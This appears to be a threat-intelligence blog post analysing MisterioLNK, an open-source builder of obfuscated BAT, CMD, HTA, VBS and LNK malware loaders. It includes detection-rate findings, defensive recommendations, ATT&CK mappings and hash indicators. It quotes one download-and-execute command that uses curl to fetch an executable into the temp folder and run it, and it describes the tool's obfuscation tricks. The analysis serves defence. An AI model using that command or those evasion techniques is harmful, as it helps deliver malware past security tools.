MisterioLNK: The Open-Source LNK Loader Builder Behind Malicious Loaders
Cyble Research and Intelligence Labs (CRIL) has uncovered a new, previously undetected loader builder known as “MisterioLNK.” This discovery follows our earlier analysis of Quantum Software, another LNK file-based builder that has been gaining traction in the cyber landscape. MisterioLNK, available on GitHub, presents a significant challenge to security defenses, as files generated by this tool currently exhibit minimal or zero detection rates by conventional security systems.
As described on GitHub, MisterioLNK is an open-source loader builder that leverages Windows script engines to execute malicious payloads while employing obfuscation as well. It is crafted to operate discreetly, downloading files into temporary directories before launching them, thereby enhancing its evasive capabilities and making detection by traditional security measures difficult.
Key features of MisterioLNK include support for five loader methods—HTA, BAT, CMD, VBS, and LNK— as well as three obfuscation methods specifically for VBS, CMD, and BAT, with plans to add support for HTA obfuscation soon. Additionally, the tool supports customizing the icon of LNK files.
The project is currently in its beta phase, and the author has cautioned that bugs and issues may exist. They encourage users to report any problems via the GitHub Issues page. Furthermore, the author disclaims any responsibility for illegal activities conducted using this software, emphasizing that users must ensure their actions comply with relevant laws and regulations. The figure below shows the GitHub post by the developer.
Threat Actors (TAs) have started utilizing the MisterioLNK loader builder to generate obfuscated files for deploying malware, such as Remcos RAT, DC RAT, and BlankStealer. Alarmingly, these loaders are largely evading detection, with many remaining undetected by most security vendors.
For our research, we generated all combinations of the loader files to evaluate their detection capabilities. The samples created using the MisterioLNK builder revealed that out of six files, only one was detected with 16 detections, two files had one detection each, and three files showed zero detections. While security vendors are successfully detecting LNK and Obfuscated VBS loaders produced by this builder, the detection rates for BAT, CMD, HTA, and VBS loader files remain low, as shown in the figure below.
Technical Details
Misterio.exe, a .NET-based tool, consists of two primary modules: a loader builder and an obfuscator. The builder accepts a URL hosting a malicious second-stage payload and generates BAT, CMD, HTA, LNK, or VBS files based on the user’s selection. The generated files are designed to connect to the URL, download the payload, and execute it. Additionally, the builder can obfuscate BAT, CMD, and VBS loader files while allowing custom icons to be added. The figure below illustrates the Misterio Dropper.
BAT/CMD Loader and Obfuscator
The BAT/CMD loader generated by the builder is designed to download files from specified URLs using the `curl` command, followed by executing the downloaded files. The resulting script is saved with a custom file icon for enhanced deception. When obfuscation is enabled, the script undergoes an additional layer of concealment.
The obfuscation module uses a technique that inserts random strings between characters in the batch code. It processes each line of the script by appending random strings, enclosed in percent signs (%), to characters that are not already within percent signs. This approach introduces seemingly random data into the code to confuse static analysis tools while still allowing the script to run without issues. Additionally, a comment line is added at the start of the script, indicating that it was processed by “MisterioLNK.”
HTA Loader:
The HTA (HTML Application) loader generated by the builder utilizes JavaScript and ActiveX objects to execute commands for downloading and running files. While the obfuscation feature for HTA files is currently inactive, it could be implemented in the future. This approach creates an HTML file with embedded script content designed to execute seamlessly upon launch.
VBS Loader and Obfuscator:
The VBS Loader leverages a shell object to execute commands for downloading and running the target file. It supports obfuscation to enhance its stealth capabilities. The obfuscation process converts each character of the VBScript into its ASCII code representation using the `Chr()` function, resulting in a series of concatenated `Chr()` calls that reconstruct the original characters when executed. The obfuscated script is then encapsulated within an `Execute()` function, which evaluates and runs the concealed code. This approach effectively obscures the script’s logic, making it difficult for static analysis tools to interpret.
LNK Loader Builder:
The tool creates a shortcut file (.lnk) that, upon execution, triggers a command to download and run the target file. It also supports setting a custom icon for the LNK file to enhance its disguise. The target command created by the link builder is “C:Windowssystem32cmd.exe /c mode 15,1 & curl hxxps://live.sysinternals.com/du.exe -o %temp%ntvy4adp.exe & start /b %temp%ntvy4adp.exe”. The figure below shows the properties of the LNK file.
Together, these modules form a powerful toolkit for generating and concealing scripts that can deliver and execute payloads with minimal detection. Their design emphasizes flexibility, adaptability, and evasion, making them potent tools in the context of threat development while also highlighting the potential risks if misused.
Conclusion
MisterioLNK is a versatile loader builder designed to create and conceal scripts that download and execute payloads using various Windows script engines. With support for multiple file formats (BAT, CMD, HTA, VBS, and LNK) and advanced obfuscation techniques, MisterioLNK effectively evades detection by traditional security tools. While currently in beta, its adaptability and focus on evasion make it a significant threat in the cybersecurity landscape. The project’s open-source nature and disclaimers about legal responsibility highlight the potential for misuse.
Our Recommendations
Implement security solutions that can recognize and detect the specific obfuscation patterns and script formats generated by MisterioLNK Builder.
Use software restriction policies or application whitelisting to limit the execution of unauthorized scripts and reduce the attack surface for loaders like MisterioLNK.
Focus on behavioral detection strategies to identify suspicious activities, like the use of scripting engines to download and execute files, regardless of obfuscation.
Educate users about the risks associated with executing files from unknown or untrusted sources, emphasizing the dangers of seemingly benign shortcut files (.lnk).
MITRE ATT&CK® Techniques
Tactic
Technique
Procedure
Execution (TA0002)
User Execution: Malicious File (T1204.002)
MisterioLNK utilizes multiple script formats (BAT, CMD, HTA, VBS, LNK) that rely on user interaction to execute the payload, typically by tricking users into running the loader file.
Execution (TA0002)
Command and Scripting Interpreter (T1059)
Uses scripting languages like BAT, CMD, and VBS to execute commands on the target system.
Execution (TA0002)
Command and Scripting Interpreter: Visual Basic (T1059.005)
Deploys obfuscated VBScript files that execute commands to download and run additional payloads.
Execution (TA0002)
Command and Scripting Interpreter: Visual Basic (T1059.003)
Relies on the Windows command line (cmd.exe) to issue commands for file downloads and execution.
Defence Evasion (TA0005)
Masquerading: Masquerade File Type (T1036.008)
Uses LNK files with altered icons to disguise the loader as a legitimate file, increasing the likelihood of user interaction.
Defence Evasion (TA0005)
Obfuscated Files or Information: Command Obfuscation (T1027.010)
MisterioLNK employs obfuscation techniques to hide the content of its scripts, making detection by security tools more difficult.
Defence Evasion (TA0011)
Application Layer Protocol: Web Protocols (T1071.001)
Uses HTTP/S through the curl command to communicate with remote servers to download payloads.
Indicators Of Compromise
Indicator
Indicator Type
Description
3bcde12b9388e30df1dee8925999e6101718fde3040d2708adbbc93b400e4a17
SHA256
Remcos
dba195e6ccc386f9d260f09e2c5d84c1a5f8b28c707e1a353f72dba9ffa2b850
SHA256
Remcos
1be9fcca5fd587accd9dbfa1b6a67a2e6bb58465dd78f775c40f6eb6480bfb5f
SHA256
Remcos
64fd11a9befea1310503336a6a8194fca7ab7af291562787c4985d1a1f06b4e1
SHA256
Remcos
0d32a67ee4193520116d2435d1d579811c5ab71c7550d433948eb82e027cc601
SHA256
DC RAT
7f8737e14ca51c1724c0f65a568cefa4d9e1536416ddf89569eab2cce8ae2e01
SHA256
BlankStealer
The post MisterioLNK: The Open-Source LNK Loader Builder Behind Malicious Loaders appeared first on Cyble.
Blog – Cyble – Read More